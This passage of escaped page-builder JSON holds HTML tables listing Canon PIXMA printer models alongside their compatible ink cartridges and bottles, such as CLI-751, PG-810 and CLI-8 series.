width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP237<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 